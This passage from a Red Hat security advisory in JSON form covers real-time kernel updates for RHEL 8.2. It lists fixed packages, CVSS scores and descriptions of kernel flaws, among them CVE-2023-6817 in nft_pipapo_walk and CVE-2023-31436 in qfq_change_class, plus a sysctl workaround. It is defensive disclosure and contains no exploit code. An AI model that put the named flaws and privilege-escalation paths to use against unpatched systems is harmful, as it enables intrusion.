"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: use after free in nvmet_tcp_free_crypto in NVMe"
},
{
"acknowledgments": [
{
"names": [
"Xingyuan Mo of IceSword Lab"
]
}
],
"cve": "CVE-2023-6817",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255139"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Netfilter subsystem in the Linux kernel via the nft_pipapo_walk function. This issue may allow a local user with CAP_NET_ADMIN capability to trigger an application crash, information disclosure, or local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: inactive elements in nft_pipapo_walk",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Only local users with `CAP_NET_ADMIN` capability or root can trigger this issue. \nOn Red Hat Enterprise Linux, local unprivileged users can exploit unprivileged user namespaces (CONFIG_USER_NS) to grant themselves this capability.\n\nThe OpenShift Container Platform (OCP) control planes or master machines are based on Red Hat Enterprise Linux CoreOS (RHCOS) that consists primarily of RHEL components, therefore, it is also affected by this kernel vulnerability. A successful exploit needs necessary privileges (CAP_NET_ADMIN) and direct, local access. A local user in RHCOS is already a root with full permissions, hence existence of this vulnerability does not bring any value from the potential attacker perspective. From the OpenShift containers perspective, this vulnerability cannot be exploited as in OpenShift the cluster processes on the node are namespaced, which means that switching the namespace in the running OpenShift container will not bring necessary capabilities.\nThis means that for OpenShift, the impact of this vulnerability is Low.\n\nSimilar to the CVE-2023-32233 vulnerability, this has been explained in the following blog post as an example of a \"Container escape vulnerability\":\nhttps://www.redhat.com/en/blog/containers-vulnerability-risk-assessment",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6817"
},
{
"category": "external",
"summary": "RHBZ#2255139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255139"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6817"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6817",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6817"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
}
],
"release_date": "2023-12-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "In order to trigger the issue, it requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: inactive elements in nft_pipapo_walk"
},
{
"cve": "CVE-2023-31436",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2023-05-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2192671"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds memory access flaw was found in the Linux kernel\u2019s traffic control (QoS) subsystem in how a user triggers the qfq_change_class function with an incorrect MTU value of the network device used as lmax. This flaw allows a local user to crash or potentially escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: out-of-bounds write in qfq_change_class function",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
